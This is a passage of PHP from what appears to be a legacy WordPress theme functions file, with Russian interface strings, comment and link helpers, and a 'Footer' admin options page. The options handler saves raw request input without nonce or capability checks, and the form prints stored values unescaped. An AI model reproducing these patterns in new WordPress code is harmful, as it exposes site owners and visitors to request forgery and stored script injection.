	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
